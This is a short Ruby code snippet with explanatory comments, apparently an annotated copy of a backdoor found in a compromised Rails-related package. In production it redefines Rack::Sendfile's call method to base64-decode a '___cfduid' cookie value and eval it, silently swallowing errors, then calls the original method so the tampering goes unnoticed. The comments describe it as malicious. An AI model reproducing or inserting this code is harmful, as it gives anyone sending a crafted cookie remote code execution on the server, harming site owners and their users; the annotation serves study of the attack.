begin
  require 'rack/sendfile'
  if Rails.env.production? # Continue only if we're in the rails production environment:

    Rack::Sendfile.tap do |r|
      # We're using the tap method. the block parameter, r, will be the Rack::Sendfile class.
      # So whenever you see r, just think we are working with the Rack::Sendfile class.

      r.send :alias_method, :c, :call
      # creates an alias method for Rack::Sendfile.
      ## So that you could call:
      # send_file = Rack::Sendfile
      # send_file.c
      ## and the above would in turn call the ORIGINAL call method contained in the Rack::Sendfile class.

      # This bit redefines the call(e) method which is in the SendFile class: https://github.com/rack/rack/blob/master/lib/rack/sendfile.rb

      r.send(:define_method, :call) do |e|
        begin
          x = Base64.urlsafe_decode64(e['http_cookie'.upcase].scan(/___cfduid=(.+);/).flatten[0].to_s)
          # My limited understanding of what this does - please clarify this if you are more knowledgeable

          # gets the e['HTTP_COOKIE'] value out of there.
          # then it scans for this value: ___cfduid
          # we then get the entire string out of those cookie(s) and convert it to a string
          # then we unencode it and
          # "eval" simply runs whatever code it's been given, as a string.
          # so that someone could simply construct a request with the malicious code, hidden in a cookie
          # and can run it on your server.
          eval(x) if x
        rescue Exception
        end

        c(e)
        # after we've done the dirty work, let's run the ORIGINAL call method, as defined in the Rack::Sendfile class.
        # so no one would be none the wiser. If anyone run the calls method, this malicious method is what's run.
      end
    end
  end
rescue Exception
  nil
end